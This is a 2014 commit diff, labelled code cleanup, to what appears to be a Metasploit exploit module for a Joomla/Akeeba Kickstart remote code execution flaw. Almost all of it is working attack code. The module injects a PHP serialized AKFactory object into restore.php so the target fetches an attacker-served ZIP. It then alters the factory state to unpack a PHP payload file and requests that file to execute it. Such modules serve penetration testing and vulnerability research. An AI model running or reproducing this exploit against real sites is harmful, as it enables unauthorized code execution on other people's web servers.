Do code cleanup

jvazquez-r7 · jvazquez-r7 · commit f07c5de7113e · 2014-10-20T13:27:48.000-05:00
diff --git a/modules/exploits/unix/webapp/joomla_akeeba_exec.rb b/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
@@ -11,18 +11,17 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
       'Name'           => "Joomla / Akeeba Kickstart Remote Code Execution",
       'Description'    => %q{
-        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and
-        earlier 3.x versions, 3.3.0 through 3.3.4 versions. The vulnerability more
-        specifically affects the Akeeba component, which is responsible for Joomla!
-        updates. Nevertheless it is worth to note that this vulnerability is only present
-        during the update of the Joomla! CMS.
+        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
+        3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
+        component, which is responsible for Joomla! updates. Nevertheless it is worth to note
+        that this vulnerability is only exploitable during the update of the Joomla! CMS.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -43,18 +42,16 @@ def initialize(info={})
         [
           [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
         ],
-      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Privileged'     => false,
       'DisclosureDate' => "Sep 29 2014",
       'DefaultTarget'  => 0))
 
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
-          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5]),
-          OptString.new('URIPATH', [true, 'The base path to the ZIP file', 'file.zip'])
-        ], self.class)
-
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+        OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5])
+      ], self.class)
   end
 
   def check
@@ -63,26 +60,26 @@ def check
     )
 
     if res && res.code == 200
-        return Exploit::CheckCode::Detected
+      return Exploit::CheckCode::Detected
     end
 
     Exploit::CheckCode::Safe
   end
 
   def primer
-    srv_uri = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+    srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
 
     php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
     php_filename = rand_text_alpha(8 + rand(8)) + '.php'
 
     # Create the zip archive
-    print_status("Creating archive with file " + php_filename)
+    print_status("Creating archive with file #{php_filename}")
     zip_file = Rex::Zip::Archive.new
     zip_file.add_file(php_filename, payload.encoded)
     @zip = zip_file.pack
 
     # First step: call restore to run _prepare() and get an initialized AKFactory
-    print_status("Sending our payload to #{peer}")
+    print_status("#{peer} - Sending PHP serialized object...")
     res = send_request_cgi({
       'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
       'vars_get'  => {
@@ -91,28 +88,41 @@ def primer
       }
     })
 
-    unless res && res.body =~ /###(.*)###/
-      fail_with("Error while injecting PHP serialized object : " + res.body)
+    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+      print_status("#{res.code}\n#{res.body}")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
     end
 
     # Second step: modify the currentPartNumber within the returned serialized AKFactory
     json = /###(.*)###/.match(res.body)[1]
-    b64encoded_prepared_factory = JSON.parse(json)['factory']
+    begin
+      b64encoded_prepared_factory = JSON.parse(json)['factory']
+    rescue JSON::ParserError
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
+    end
+
     prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
     modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
 
+    print_status("#{peer} - Sending initialized and modified AKFactory...")
     res = send_request_cgi({
       'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
       'vars_get'  => {
         'task'    => 'stepRestore',
         'factory' => Rex::Text.encode_base64(modified_factory)
       }
     })
+
+    unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
+    end
+
     register_files_for_cleanup(php_filename)
 
+    print_status("#{peer} - Executing payload...")
     send_request_cgi({
       'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
-    })
+    }, 2)
 
   end
 
@@ -126,13 +136,14 @@ def exploit
 
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
-    if (not @zip)
-      print_error("A request came in, but the ZIP archive wasn't ready yet!")
+    if @zip && request.uri =~ /\.zip$/
+      print_status("Sending the ZIP archive...")
+      send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
       return
     end
 
-    print_status("Sending the ZIP archive to the server...")
-    send_response(cli, @zip)
+    print_status("Sending not found...")
+    send_not_found(cli)
   end
 
 end
